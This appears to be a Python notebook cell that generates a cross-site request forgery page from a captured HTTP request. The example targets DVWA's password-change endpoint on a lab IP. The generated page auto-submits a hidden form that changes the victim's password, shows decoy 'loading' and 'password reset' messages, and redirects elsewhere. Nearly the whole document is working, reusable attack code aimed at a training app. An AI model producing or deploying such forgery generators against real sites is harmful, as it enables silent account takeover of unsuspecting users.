In [ ]:
import urllib.parse

# ==== CONFIG ====
AUTO_JUMP = True
JUMP_URL = "http://example.com"
LOADING_MSG = "正在加载，请稍候..."
PASSWORD_HINT = "密码重置中..."
# ================


def parse_request(raw):
    lines = raw.strip().split('\n')
    method, full_path, _ = lines[0].split()
    host = ''
    for line in lines:
        if line.lower().startswith('host:'):
            host = line.split(':', 1)[1].strip()

    # 提取参数
    url_parts = urllib.parse.urlparse(full_path)
    action = f"http://{host}{url_parts.path}"
    params = urllib.parse.parse_qs(url_parts.query)

    return action, params


def generate_fancy_form(action, params):
    html = f'''<!DOCTYPE html>
<html lang="zh">
<head>
  <meta charset="UTF-8">
  <title>Redirecting...</title>
  <style>
    body {{
      background-color: #fff;
      font-family: Arial, sans-serif;
      text-align: center;
      margin-top: 20%;
      color: #333;
    }}
    .spinner {{
      border: 5px solid #f3f3f3;
      border-top: 5px solid #3498db;
      border-radius: 50%;
      width: 30px;
      height: 30px;
      animation: spin 1s linear infinite;
      margin: 20px auto;
    }}
    @keyframes spin {{
      0% {{ transform: rotate(0deg); }}
      100% {{ transform: rotate(360deg); }}
    }}
  </style>
</head>
<body onload="document.forms[0].submit();">
  <h2>{LOADING_MSG}</h2>
  <div class="spinner"></div>
  <p>{PASSWORD_HINT}</p>

  <form action="{action}" method="GET">\n'''

    for key, values in params.items():
        for val in values:
            html += f'    <input type="hidden" name="{key}" value="{val}">\n'

    html += '''  </form>\n'''

    if AUTO_JUMP:
        html += f'''
  <script>
    setTimeout(function() {{
      window.location.href = "{JUMP_URL}";
    }}, 2000);
  </script>
'''
    html += '''</body>\n</html>'''
    return html


# === 示例用法 ===
raw_request = """GET /DVWA/vulnerabilities/csrf/?password_current=password&password_new=test123&password_conf=test123&Change=Change&user_token=86a63ed1b1b6a565ee05566ed1d2eda3 HTTP/1.1
Host: 192.168.88.129
User-Agent: Mozilla/5.0
"""

if __name__ == "__main__":
    action, params = parse_request(raw_request)
    html = generate_fancy_form(action, params)
    with open("attack.html", "w") as f:
        f.write(html)
    print("✅ 已生成强化版 attack.html — 含提示 + 自动跳转")


✅ 已生成 csrf_attack.html
